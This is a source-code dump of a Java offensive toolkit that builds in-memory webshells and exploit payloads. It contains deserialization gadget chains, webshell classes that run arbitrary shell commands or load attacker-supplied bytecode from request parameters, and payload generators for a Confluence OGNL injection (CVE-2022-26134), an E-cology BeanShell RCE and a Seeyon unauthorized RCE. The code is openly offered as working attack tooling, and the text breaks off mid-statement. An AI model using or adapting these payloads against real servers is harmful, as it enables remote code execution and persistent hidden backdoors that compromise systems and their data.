final Class... ifaces) throws Exception { 72 | return createProxy(createMemoizedInvocationHandler(map), iface, ifaces); 73 | } 74 | 75 | 76 | public static InvocationHandler createMemoizedInvocationHandler(final Map map) throws Exception { 77 | return (InvocationHandler) Reflections.getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map); 78 | } 79 | 80 | 81 | public static T createProxy(final InvocationHandler ih, final Class iface, final Class... ifaces) { 82 | final Class[] allIfaces = (Class[]) Array.newInstance(Class.class, ifaces.length + 1); 83 | allIfaces[0] = iface; 84 | if (ifaces.length > 0) { 85 | System.arraycopy(ifaces, 0, allIfaces, 1, ifaces.length); 86 | } 87 | return iface.cast(Proxy.newProxyInstance(Gadgets.class.getClassLoader(), allIfaces, ih)); 88 | } 89 | 90 | 91 | public static Map createMap(final String key, final Object val) { 92 | final Map map = new HashMap(); 93 | map.put(key, val); 94 | return map; 95 | } 96 | 97 | 98 | public static Object createTemplatesImpl(PayloadType type, String trojanString) throws Exception { 99 | if (Boolean.parseBoolean(System.getProperty("properXalan", "false"))) { 100 | return createTemplatesImpl( 101 | type, 102 | Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"), 103 | Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"), 104 | Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl"), 105 | trojanString 106 | ); 107 | } 108 | 109 | return createTemplatesImpl(type, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class, trojanString); 110 | } 111 | 112 | 113 | public static T createTemplatesImpl(PayloadType type, Class tplClass, Class abstTranslet, Class transFactory, String trojanString) 114 | throws Exception { 115 | 116 | final T templates = tplClass.newInstance(); 117 | byte[] classBytes = TemplateImplClassBytes(type, abstTranslet); 118 | // inject class bytes into instance 119 | Reflections.setFieldValue(templates, "_bytecodes", new byte[][]{ 120 | classBytes, ClassFiles.classAsBytes(Foo.class) 121 | }); 122 | 123 | // required to make TemplatesImpl happy 124 | Reflections.setFieldValue(templates, "_name", "Pwnr"); 125 | Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance()); 126 | return templates; 127 | } 128 | 129 | 130 | public static HashMap makeMap(Object v1, Object v2) throws Exception, ClassNotFoundException, NoSuchMethodException, InstantiationException, 131 | IllegalAccessException, InvocationTargetException { 132 | HashMap s = new HashMap(); 133 | Reflections.setFieldValue(s, "size", 2); 134 | Class nodeC; 135 | try { 136 | nodeC = Class.forName("java.util.HashMap$Node"); 137 | } catch (ClassNotFoundException e) { 138 | 139 | nodeC = Class.forName("java.util.HashMap$Entry"); 140 | } 141 | Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); 142 | Reflections.setAccessible(nodeCons); 143 | 144 | Object tbl = Array.newInstance(nodeC, 2); 145 | Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); 146 | Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); 147 | Reflections.setFieldValue(s, "table", tbl); 148 | return s; 149 | } 150 | 151 | public static Transformer[] createTransformers(PayloadType type, String trojanType) throws Exception { 152 | String memShellStr = ""; 153 | switch (type){ 154 | case commandmemshell: 155 | memShellStr = Util.generateBcelCode1(CommandMemShell.class); 156 | break; 157 | case jbosslistenermemshell: 158 | memShellStr = Util.generateBcelCode1(JBossListenerMemShell.class); 159 | break; 160 | case jbossfiltermemshell: 161 | memShellStr = Util.generateBcelCode1(JBossFilterMemShell.class); 162 | break; 163 | } 164 | Transformer[] transformers = new Transformer[]{ 165 | new ConstantTransformer(com.sun.org.apache.bcel.internal.util.ClassLoader.class), 166 | new InvokerTransformer("getConstructor", new Class[]{Class[].class}, new Object[]{new Class[]{}}), 167 | new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new String[]{}}), 168 | new InvokerTransformer("loadClass", new Class[]{String.class}, new Object[]{ 169 | memShellStr}), 170 | new InvokerTransformer("newInstance", new Class[]{}, new Object[]{}), 171 | new ConstantTransformer(Integer.valueOf(1))}; 172 | 173 | return transformers; 174 | } 175 | } 176 | 177 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/utils/JavassistClassLoader.java: -------------------------------------------------------------------------------- 1 | package core.gadgets.utils; 2 | 3 | /** 4 | * @ClassName: JavassistClassLoader 5 | * @Description: TODO 6 | * @Author: Summer 7 | * @Date: 2022/1/24 16:34 8 | * @Version: v1.0.0 9 | * @Description: 10 | **/ 11 | public class JavassistClassLoader extends ClassLoader { 12 | public JavassistClassLoader(){ 13 | super(Thread.currentThread().getContextClassLoader()); 14 | } 15 | } -------------------------------------------------------------------------------- /src/main/java/core/gadgets/utils/Reflections.java: -------------------------------------------------------------------------------- 1 | package core.gadgets.utils; 2 | 3 | import com.nqzero.permit.Permit; 4 | import sun.reflect.ReflectionFactory; 5 | 6 | import java.lang.reflect.AccessibleObject; 7 | import java.lang.reflect.Constructor; 8 | import java.lang.reflect.Field; 9 | import java.lang.reflect.InvocationTargetException; 10 | 11 | @SuppressWarnings ( "restriction" ) 12 | public class Reflections { 13 | 14 | public static void setAccessible(AccessibleObject member) { 15 | // quiet runtime warnings from JDK9+ 16 | Permit.setAccessible(member); 17 | } 18 | 19 | public static Field getField(final Class clazz, final String fieldName) { 20 | Field field = null; 21 | try { 22 | field = clazz.getDeclaredField(fieldName); 23 | setAccessible(field); 24 | } 25 | catch (NoSuchFieldException ex) { 26 | if (clazz.getSuperclass() != null) 27 | field = getField(clazz.getSuperclass(), fieldName); 28 | } 29 | return field; 30 | } 31 | 32 | public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { 33 | final Field field = getField(obj.getClass(), fieldName); 34 | field.set(obj, value); 35 | } 36 | 37 | public static Object getFieldValue(final Object obj, final String fieldName) throws Exception { 38 | final Field field = getField(obj.getClass(), fieldName); 39 | return field.get(obj); 40 | } 41 | 42 | public static Constructor getFirstCtor(final String name) throws Exception { 43 | final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0]; 44 | setAccessible(ctor); 45 | return ctor; 46 | } 47 | 48 | public static Object newInstance(String className, Object ... args) throws Exception { 49 | return getFirstCtor(className).newInstance(args); 50 | } 51 | 52 | public static T createWithoutConstructor ( Class classToInstantiate ) 53 | throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { 54 | return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]); 55 | } 56 | 57 | @SuppressWarnings ( {"unchecked"} ) 58 | public static T createWithConstructor ( Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs ) 59 | throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { 60 | Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); 61 | setAccessible(objCons); 62 | Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); 63 | setAccessible(sc); 64 | return (T)sc.newInstance(consArgs); 65 | } 66 | 67 | } -------------------------------------------------------------------------------- /src/main/java/core/gadgets/utils/Util.java: -------------------------------------------------------------------------------- 1 | package core.gadgets.utils; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 4 | import core.GenerateMemShell; 5 | import core.enumtypes.PayloadType; 6 | import core.memshell.*; 7 | import javassist.ClassClassPath; 8 | import javassist.ClassPool; 9 | import javassist.CtClass; 10 | 11 | public class Util { 12 | 13 | 14 | public static byte[] deleteAt(byte[] bs, int index) { 15 | int length = bs.length - 1; 16 | byte[] ret = new byte[length]; 17 | 18 | if(index == bs.length - 1) { 19 | System.arraycopy(bs, 0, ret, 0, length); 20 | } else if(index < bs.length - 1) { 21 | for(int i = index; i < length; i++) { 22 | bs[i] = bs[i + 1]; 23 | } 24 | 25 | System.arraycopy(bs, 0, ret, 0, length); 26 | } 27 | 28 | return ret; 29 | } 30 | 31 | public static byte[] addAtIndex(byte[] bs, int index, byte b) { 32 | int length = bs.length + 1; 33 | byte[] ret = new byte[length]; 34 | 35 | System.arraycopy(bs, 0, ret, 0, index); 36 | ret[index] = b; 37 | System.arraycopy(bs, index, ret, index + 1, length - index - 1); 38 | 39 | return ret; 40 | } 41 | 42 | public static byte[] addAtLast(byte[] bs, byte b) { 43 | int length = bs.length + 1; 44 | byte[] ret = new byte[length]; 45 | 46 | System.arraycopy(bs, 0, ret, 0, length-1); 47 | ret[length - 1] = b; 48 | 49 | return ret; 50 | } 51 | 52 | public static byte[] TemplateImplClassBytes(PayloadType type, Class abstTranslet) throws Exception { 53 | CtClass clazz = null; 54 | byte[] classBytes = null; 55 | switch (type) { 56 | case tongweblistenermemshell: 57 | clazz = utils.Util.addSuperClass(TongWebListenerMemShell.class, AbstractTranslet.class.getName()); 58 | classBytes = clazz.toBytecode(); 59 | break; 60 | case tongwebfiltermemshell: 61 | clazz = utils.Util.addSuperClass(TongWebFilterMemShell.class, AbstractTranslet.class.getName()); 62 | classBytes = clazz.toBytecode(); 63 | break; 64 | case shiromemshell: 65 | ClassPool pool = ClassPool.getDefault(); 66 | ClassClassPath classPath = new ClassClassPath(Util.class); 67 | pool.insertClassPath(classPath); 68 | ShiroMemShell shiroMemShell = new ShiroMemShell(); 69 | clazz = shiroMemShell.genPayload(pool); 70 | CtClass superClass = pool.get(abstTranslet.getName()); 71 | clazz.setSuperclass(superClass); 72 | classBytes = clazz.toBytecode(); 73 | 74 | break; 75 | case weblogiclistenermemshell: 76 | clazz = utils.Util.addSuperClass(WeblogicListenerMemShell.class, AbstractTranslet.class.getName()); 77 | classBytes = clazz.toBytecode(); 78 | break; 79 | case weblogicfiltermemshell: 80 | clazz = utils.Util.addSuperClass(WeblogicFilterMemShell.class, AbstractTranslet.class.getName()); 81 | classBytes = clazz.toBytecode(); 82 | break; 83 | case commandmemshell: 84 | clazz = utils.Util.addSuperClass(CommandMemShell.class, AbstractTranslet.class.getName()); 85 | classBytes = clazz.toBytecode(); 86 | break; 87 | case jbosslistenermemshell: 88 | clazz = utils.Util.addSuperClass(JBossListenerMemShell.class, AbstractTranslet.class.getName()); 89 | classBytes = clazz.toBytecode(); 90 | break; 91 | case jbossfiltermemshell: 92 | clazz = utils.Util.addSuperClass(JBossFilterMemShell.class, AbstractTranslet.class.getName()); 93 | classBytes = clazz.toBytecode(); 94 | break; 95 | case resinfiltermemshell: 96 | clazz = utils.Util.addSuperClass(ResinFilterMemShell.class, AbstractTranslet.class.getName()); 97 | classBytes = clazz.toBytecode(); 98 | break; 99 | case resinlistenermemshell: 100 | clazz = utils.Util.addSuperClass(ResinListenerMemShell.class, AbstractTranslet.class.getName()); 101 | classBytes = clazz.toBytecode(); 102 | break; 103 | case jettyfiltermemshell: 104 | clazz = utils.Util.addSuperClass(JettyFilterMemShell.class, AbstractTranslet.class.getName()); 105 | classBytes = clazz.toBytecode(); 106 | break; 107 | case jettylistenermemshell: 108 | clazz = utils.Util.addSuperClass(JettyListenerMemShell.class, AbstractTranslet.class.getName()); 109 | classBytes = clazz.toBytecode(); 110 | break; 111 | case glassfishfiltermemshell: 112 | clazz = utils.Util.addSuperClass(GlassFishFilterMemShell.class, AbstractTranslet.class.getName()); 113 | classBytes = clazz.toBytecode(); 114 | break; 115 | case glassfishlistenermemshell: 116 | clazz = utils.Util.addSuperClass(GlassFishListenerMemShell.class, AbstractTranslet.class.getName()); 117 | classBytes = clazz.toBytecode(); 118 | break; 119 | case springwebfluxhandlermemshell: 120 | String codeStr = GenerateMemShell.generateMemShell("SpringWebfluxHandlerMemShellAbstractTranslet", "BASE64", "8"); 121 | classBytes = core.utils.Util.base64Decode(codeStr); 122 | break; 123 | case tomcatfiltermemshell: 124 | clazz = utils.Util.addSuperClass(TomcatFilterMemShell.class, AbstractTranslet.class.getName()); 125 | classBytes = clazz.toBytecode(); 126 | break; 127 | case tomcatlistenermemshell: 128 | clazz = utils.Util.addSuperClass(TomcatListenerMemShell.class, AbstractTranslet.class.getName()); 129 | classBytes = clazz.toBytecode(); 130 | break; 131 | case springbootmemshell: 132 | clazz = utils.Util.addSuperClass(SpringBootMemShell.class, AbstractTranslet.class.getName()); 133 | classBytes = clazz.toBytecode(); 134 | break; 135 | } 136 | return classBytes; 137 | } 138 | } 139 | -------------------------------------------------------------------------------- /src/main/java/core/memshell/CommandMemShell.java: -------------------------------------------------------------------------------- 1 | package core.memshell; 2 | 3 | 4 | import java.io.IOException; 5 | import java.io.InputStream; 6 | import java.util.Scanner; 7 | 8 | 9 | public class CommandMemShell{ 10 | 11 | public CommandMemShell(){ 12 | try { 13 | String cmd = "{{cmd}}"; 14 | boolean isLinux = true; 15 | String osTyp = System.getProperty("os.name"); 16 | if (osTyp != null && osTyp.toLowerCase().contains("win")) { 17 | isLinux = false; 18 | } 19 | String[] cmds = isLinux ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd}; 20 | InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); 21 | Scanner s = new Scanner(in).useDelimiter("\\a"); 22 | } catch (IOException e) { 23 | e.printStackTrace(); 24 | } 25 | } 26 | static{ 27 | new CommandMemShell(); 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /src/main/java/core/memshell/ShiroMemShell.java: -------------------------------------------------------------------------------- 1 | package core.memshell; 2 | 3 | import javassist.ClassPool; 4 | import javassist.CtClass; 5 | import javassist.CtMethod; 6 | import javassist.CtNewConstructor; 7 | import org.apache.shiro.codec.Base64; 8 | 9 | import java.lang.reflect.Field; 10 | import java.lang.reflect.Method; 11 | import java.util.List; 12 | 13 | public class ShiroMemShell { 14 | private static Object getFV(Object o, String s) throws Exception { 15 | Field f = null; 16 | Class clazz = o.getClass(); 17 | while (clazz != Object.class) { 18 | try { 19 | f = clazz.getDeclaredField(s); 20 | break; 21 | } catch (NoSuchFieldException var5) { 22 | clazz = clazz.getSuperclass(); 23 | } 24 | } 25 | if (f == null) { 26 | throw new NoSuchFieldException(s); 27 | } else { 28 | f.setAccessible(true); 29 | return f.get(o); 30 | } 31 | } 32 | 33 | public ShiroMemShell() { 34 | try { 35 | String dy = null; 36 | boolean done = false; 37 | Thread[] ts = (Thread[]) ((Thread[]) getFV(Thread.currentThread().getThreadGroup(), "threads")); 38 | for (int i = 0; i < ts.length; ++i) { 39 | Thread t = ts[i]; 40 | if (t != null) { 41 | String s = t.getName(); 42 | if (!s.contains("exec") && s.contains("http")) { 43 | Object o = getFV(t, "target"); 44 | if (o instanceof Runnable) { 45 | try { 46 | o = getFV(getFV(getFV(o, "this$0"), "handler"), "global"); 47 | } catch (Exception var16) { 48 | continue; 49 | } 50 | List ps = (List) getFV(o, "processors"); 51 | for (int j = 0; j < ps.size(); ++j) { 52 | Object p = ps.get(j); 53 | o = getFV(p, "req"); 54 | Object resp = o.getClass().getMethod("getResponse").invoke(o); 55 | Object conreq = o.getClass().getMethod("getNote", Integer.TYPE).invoke(o, new Integer(1)); 56 | dy = (String) conreq.getClass().getMethod("getParameter", String.class).invoke(conreq, new String("dy")); 57 | if (dy != null && !dy.isEmpty()) { 58 | System.out.println("dy:" + dy); 59 | byte[] bytecodes = Base64.decode(dy); 60 | Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE); 61 | defineClassMethod.setAccessible(true); 62 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), bytecodes, new Integer(0), new Integer(bytecodes.length)); 63 | cc.newInstance().equals(conreq); 64 | done = true; 65 | } 66 | if (done) { 67 | break; 68 | } 69 | } 70 | } 71 | } 72 | } 73 | } 74 | } catch (Exception var17) { 75 | } 76 | } 77 | 78 | public CtClass genPayload(ClassPool pool) throws Exception { 79 | CtClass clazz = pool.makeClass("x.Test" + System.nanoTime()); 80 | if ((clazz.getDeclaredConstructors()).length != 0) 81 | clazz.removeConstructor(clazz.getDeclaredConstructors()[0]); 82 | clazz.addMethod(CtMethod.make(" private static Object getFV(Object o, String s) throws Exception {\n java.lang.reflect.Field f = null;\n Class clazz = o.getClass();\n while (clazz != Object.class) {\n try {\n f = clazz.getDeclaredField(s);\n break;\n } catch (NoSuchFieldException e) {\n clazz = clazz.getSuperclass();\n }\n }\n if (f == null) {\n throw new NoSuchFieldException(s);\n }\n f.setAccessible(true);\n return f.get(o);\n}", clazz)); 83 | clazz.addConstructor(CtNewConstructor.make(" public InjectMemTool() {\n try {\n Object o;\n String s;\n String dy = null;\n Object resp;\n boolean done = false;\n Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n for (int i = 0; i < ts.length; i++) {\n Thread t = ts[i];\n if (t == null) {\n continue;\n }\n s = t.getName();\n if (!s.contains(\"exec\") && s.contains(\"http\")) {\n o = getFV(t, \"target\");\n if (!(o instanceof Runnable)) {\n continue;\n }\n\n try {\n o = getFV(getFV(getFV(o, \"this$0\"), \"handler\"), \"global\");\n } catch (Exception e) {\n continue;\n }\n\n java.util.List ps = (java.util.List) getFV(o, \"processors\");\n for (int j = 0; j < ps.size(); j++) {\n Object p = ps.get(j);\n o = getFV(p, \"req\");\n resp = o.getClass().getMethod(\"getResponse\", new Class[0]).invoke(o, new Object[0]);\n\n Object conreq = o.getClass().getMethod(\"getNote\", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});\n\n dy = (String) conreq.getClass().getMethod(\"getParameter\", new Class[]{String.class}).invoke(conreq, new Object[]{new String(\"dy\")});\n\n if (dy != null && !dy.isEmpty()) {\n byte[] bytecodes = org.apache.shiro.codec.Base64.decode(dy);\n\n java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(\"defineClass\", new Class[]{byte[].class, int.class, int.class});\n defineClassMethod.setAccessible(true);\n\n Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});\n\n cc.newInstance().equals(conreq);\n done = true;\n }\n if (done) {\n break;\n }\n }\n }\n }\n } catch (Exception e) {\n ;\n }\n}", clazz)); 84 | return clazz; 85 | } 86 | } 87 | -------------------------------------------------------------------------------- /src/main/java/core/memshell/SpringWebfluxHandlerMemShell.java: -------------------------------------------------------------------------------- 1 | package core.memshell;//package core.memshell; 2 | // 3 | //import com.sun.org.apache.xalan.internal.xsltc.DOM; 4 | //import com.sun.org.apache.xalan.internal.xsltc.TransletException; 5 | //import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 6 | //import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 7 | //import com.sun.org.apache.xml.internal.serializer.SerializationHandler; 8 | //import org.springframework.http.HttpStatus; 9 | //import org.springframework.http.ResponseEntity; 10 | //import org.springframework.web.bind.annotation.PostMapping; 11 | //import org.springframework.web.reactive.result.method.RequestMappingInfo; 12 | //import org.springframework.web.server.ServerWebExchange; 13 | //import reactor.core.publisher.Mono; 14 | // 15 | //import java.lang.reflect.Method; 16 | //import java.net.URL; 17 | //import java.net.URLClassLoader; 18 | //import java.util.HashMap; 19 | //import java.util.Map; 20 | // 21 | // 22 | //public class SpringWebfluxHandlerMemShell extends AbstractTranslet { 23 | // public static Map store = new HashMap(); 24 | // public static String pass = "pAS3", md5, xc = "3c6e0b8a9c15224a"; 25 | // 26 | // public static String doInject(Object obj, String path) { 27 | // String msg; 28 | // try { 29 | // md5 = md5(pass + xc); 30 | // Method registerHandlerMethod = obj.getClass().getDeclaredMethod("registerHandlerMethod", Object.class, Method.class, RequestMappingInfo.class); 31 | // registerHandlerMethod.setAccessible(true); 32 | // Method executeCommand = SpringWebfluxHandlerMemShell.class.getDeclaredMethod("xx", ServerWebExchange.class); 33 | // RequestMappingInfo requestMappingInfo = RequestMappingInfo.paths(path).build(); 34 | // registerHandlerMethod.invoke(obj, new SpringWebfluxHandlerMemShell(), executeCommand, requestMappingInfo); 35 | // msg = "ok"; 36 | // } catch (Exception e) { 37 | // e.printStackTrace(); 38 | // msg = "error"; 39 | // } 40 | // return msg; 41 | // } 42 | // 43 | // 44 | // private static Class defineClass(byte[] classbytes) throws Exception { 45 | // URLClassLoader urlClassLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader()); 46 | // Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); 47 | // method.setAccessible(true); 48 | // return (Class) method.invoke(urlClassLoader, classbytes, 0, classbytes.length); 49 | // } 50 | // 51 | // public byte[] x(byte[] s, boolean m) { 52 | // try { 53 | // javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES"); 54 | // c.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES")); 55 | // return c.doFinal(s); 56 | // } catch (Exception e) { 57 | // return null; 58 | // } 59 | // } 60 | // 61 | // public static String md5(String s) { 62 | // String ret = null; 63 | // try { 64 | // java.security.MessageDigest m; 65 | // m = java.security.MessageDigest.getInstance("MD5"); 66 | // m.update(s.getBytes(), 0, s.length()); 67 | // ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase(); 68 | // } catch (Exception e) { 69 | // } 70 | // return ret; 71 | // } 72 | // 73 | // public static String base64Encode(byte[] bs) throws Exception { 74 | // String value = null; 75 | // 76 | // Class base64; 77 | // try { 78 | // base64 = Class.forName("java.util.Base64"); 79 | // Object Encoder = base64.getMethod("getEncoder", (Class[])null).invoke(base64, (Object[])null); 80 | // value = (String)Encoder.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder, bs); 81 | // } catch (Exception var6) { 82 | // try { 83 | // base64 = Class.forName("sun.misc.BASE64Encoder"); 84 | // Object Encoder = base64.newInstance(); 85 | // value = (String)Encoder.getClass().getMethod("encode", byte[].class).invoke(Encoder, bs); 86 | // } catch (Exception var5) { 87 | // } 88 | // } 89 | // 90 | // return value; 91 | // } 92 | // 93 | // public static byte[] base64Decode(String bs) throws Exception { 94 | // byte[] value = null; 95 | // 96 | // Class base64; 97 | // try { 98 | // base64 = Class.forName("java.util.Base64"); 99 | // Object decoder = base64.getMethod("getDecoder", (Class[])null).invoke(base64, (Object[])null); 100 | // value = (byte[])((byte[])decoder.getClass().getMethod("decode", String.class).invoke(decoder, bs)); 101 | // } catch (Exception var6) { 102 | // try { 103 | // base64 = Class.forName("sun.misc.BASE64Decoder"); 104 | // Object decoder = base64.newInstance(); 105 | // value = (byte[])((byte[])decoder.getClass().getMethod("decodeBuffer", String.class).invoke(decoder, bs)); 106 | // } catch (Exception var5) { 107 | // } 108 | // } 109 | // 110 | // return value; 111 | // } 112 | // 113 | // @PostMapping("/xx") 114 | // public synchronized ResponseEntity xx( 115 | // ServerWebExchange pdata) { 116 | // try { 117 | // Object bufferStream = pdata.getFormData().flatMap(c -> { 118 | // StringBuilder result = new StringBuilder(); 119 | // try { 120 | // String id = c.getFirst(pass); 121 | // byte[] data = x(base64Decode(id), false); 122 | // if (store.get("payload") == null) { 123 | // store.put("payload", defineClass(data)); 124 | // } else { 125 | // store.put("parameters", data); 126 | // java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream(); 127 | // Object f = ((Class) store.get("payload")).newInstance(); 128 | // f.equals(arrOut); 129 | // f.equals(data); 130 | // result.append(md5.substring(0, 16)); 131 | // f.toString(); 132 | // result.append(base64Encode(x(arrOut.toByteArray(), true))); 133 | // result.append(md5.substring(16)); 134 | // } 135 | // } catch (Exception ex) { 136 | // result.append(ex.getMessage()); 137 | // } 138 | // return Mono.just(result.toString()); 139 | // }); 140 | // return new ResponseEntity(bufferStream, HttpStatus.OK); 141 | // } catch (Exception ex) { 142 | // return new ResponseEntity(ex.getMessage(), HttpStatus.OK); 143 | // } 144 | // } 145 | // 146 | // @Override 147 | // public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { 148 | // 149 | // } 150 | // 151 | // @Override 152 | // public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { 153 | // 154 | // } 155 | //} -------------------------------------------------------------------------------- /src/main/java/core/payloads/Confluence_CVE_2022_26134.java: -------------------------------------------------------------------------------- 1 | package core.payloads; 2 | 3 | import core.GenerateMemShell; 4 | import core.enumtypes.PayloadType; 5 | import core.utils.Util; 6 | import javassist.ClassPool; 7 | import javassist.CtClass; 8 | 9 | import java.io.ByteArrayInputStream; 10 | import java.net.URLEncoder; 11 | import java.util.UUID; 12 | 13 | public class Confluence_CVE_2022_26134 { 14 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 15 | String className = ""; 16 | String base64CodeStr = ""; 17 | String getParam = "%24%7B%23a%3Dnew%20javax.script.ScriptEngineManager().getEngineByName(%22js%22).eval(%40com.opensymphony.webwork.ServletActionContext%40getRequest().getParameter(%22search%22)).(%40com.opensymphony.webwork.ServletActionContext%40getResponse().setHeader(%22X-Status%22%2C%22ok%22))%7D/"; 18 | String payloadTemplate = "var classBytes = java.util.Base64.getDecoder().decode(\"{payload}\");\n" + 19 | "var loader = java.lang.Thread.currentThread().getContextClassLoader();\n" + 20 | "var reflectUtilsClass = java.lang.Class.forName(\"org.springframework.cglib.core.ReflectUtils\",true,loader);\n" + 21 | "var urls = java.lang.reflect.Array.newInstance(java.lang.Class.forName(\"java.net.URL\"),0);\n" + 22 | "\n" + 23 | "var params = java.lang.reflect.Array.newInstance(java.lang.Class.forName(\"java.lang.Class\"),3);\n" + 24 | "params[0] = java.lang.Class.forName(\"java.lang.String\");\n" + 25 | "params[1] = java.lang.Class.forName(\"[B\");\n" + 26 | "params[2] = java.lang.Class.forName(\"java.lang.ClassLoader\");\n" + 27 | "\n" + 28 | "\n" + 29 | "var defineClassMethod = reflectUtilsClass.getMethod(\"defineClass\",params);\n" + 30 | "\n" + 31 | "params = java.lang.reflect.Array.newInstance(java.lang.Class.forName(\"java.lang.Object\"),3);\n" + 32 | "\n" + 33 | "params[0] = \"{className}\";\n" + 34 | "params[1] = classBytes;\n" + 35 | "params[2] = loader;\n" + 36 | "defineClassMethod.invoke(null,params).newInstance();\n" + 37 | "\"ok\";"; 38 | switch (type) { 39 | case tomcatfiltermemshell: 40 | base64CodeStr = GenerateMemShell.generateMemShell("TomcatFilterMemShell", "BASE64", "6"); 41 | className = "TomcatFilterMemShell"; 42 | break; 43 | case tomcatlistenermemshell: 44 | base64CodeStr = GenerateMemShell.generateMemShell("TomcatListenerMemShell", "BASE64", "6"); 45 | className = "TomcatListenerMemShell"; 46 | break; 47 | } 48 | ClassPool cp = ClassPool.getDefault(); 49 | CtClass ctClass = cp.makeClass(new ByteArrayInputStream(Util.base64Decode(base64CodeStr))); 50 | ctClass.setName("com.opensymphony.xwork." + UUID.randomUUID().toString().replace("-", "")); 51 | return getParam + "postData" + payloadTemplate.replace("{payload}", Util.base64Encode(ctClass.toBytecode())).replace("\n", "").replace("{className}", ctClass.getName()); 52 | } 53 | } 54 | -------------------------------------------------------------------------------- /src/main/java/core/payloads/ECology_BeanShell_RCE.java: -------------------------------------------------------------------------------- 1 | package core.payloads; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.memshell.ResinFilterMemShell; 5 | import core.memshell.ResinListenerMemShell; 6 | import core.memshell.TomcatFilterMemShell; 7 | import utils.Util; 8 | 9 | import java.net.URLEncoder; 10 | 11 | public class ECology_BeanShell_RCE { 12 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 13 | byte[] bytecodes = null; 14 | String payloadTemplate = "a=\"{code}\";eval(\"new com.sun.org.apache.bcel.internal.util.ClassLoader().loadClass(a).newInstance();\")"; 15 | switch (type) { 16 | case resinfiltermemshell: 17 | bytecodes = Util.getClassBytes(ResinFilterMemShell.class); 18 | break; 19 | case resinlistenermemshell: 20 | bytecodes = Util.getClassBytes(ResinListenerMemShell.class); 21 | break; 22 | case tomcatfiltermemshell: 23 | bytecodes = Util.getClassBytes(TomcatFilterMemShell.class); 24 | break; 25 | } 26 | 27 | String bcelCodeStr = Util.generateBcelCode2(bytecodes); 28 | return URLEncoder.encode(payloadTemplate.replace("{code}", bcelCodeStr).replace("\n", "")); 29 | } 30 | 31 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 32 | String payload = getObject(type, trojanType).toString(); 33 | return payload.getBytes(); 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /src/main/java/core/payloads/Seeyon_Unauthorized_RCE.java: -------------------------------------------------------------------------------- 1 | package core.payloads; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.memshell.CommandMemShell; 5 | import core.memshell.TomcatFilterMemShell; 6 | import core.memshell.TomcatListenerMemShell; 7 | import core.utils.Util; 8 | 9 | import java.net.URLEncoder; 10 | 11 | public class Seeyon_Unauthorized_RCE { 12 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 13 | String payloadTemplate = "[{'formulaType': 1, 'formulaName': 'test', 'formulaExpression': 'String name1 = \"com.sun.org.apache.bcel.internal.util.Class\";\n" + 14 | "String name2 = \"Loader\";\n" + 15 | "Class clazz = Class.forName(name1 + name2);\n" + 16 | "java.lang.reflect.Constructor con = clazz.getConstructor();\n" + 17 | "Object obj = con.newInstance();\n" + 18 | "java.lang.reflect.Method me = clazz.getMethod(\"loadClass\", String.class);\n" + 19 | "me.invoke(obj,new String(new sun.misc.BASE64Decoder().decodeBuffer(\"{code}\"))).newInstance();};test();def static xxx(){'}, '', {}, 'true']"; 20 | 21 | byte[] bytecodes = null; 22 | switch (type) { 23 | case tomcatfiltermemshell: 24 | bytecodes = utils.Util.getClassBytes(TomcatFilterMemShell.class); 25 | break; 26 | case tomcatlistenermemshell: 27 | bytecodes = utils.Util.getClassBytes(TomcatListenerMemShell.class); 28 | break; 29 | case commandmemshell: 30 | bytecodes = utils.Util.getClassBytes(CommandMemShell.class); 31 | break; 32 | } 33 | 34 | String bcelCodeStr = Util.base64Encode(utils.Util.generateBcelCode2(bytecodes).getBytes()); 35 | String payloadTmp = 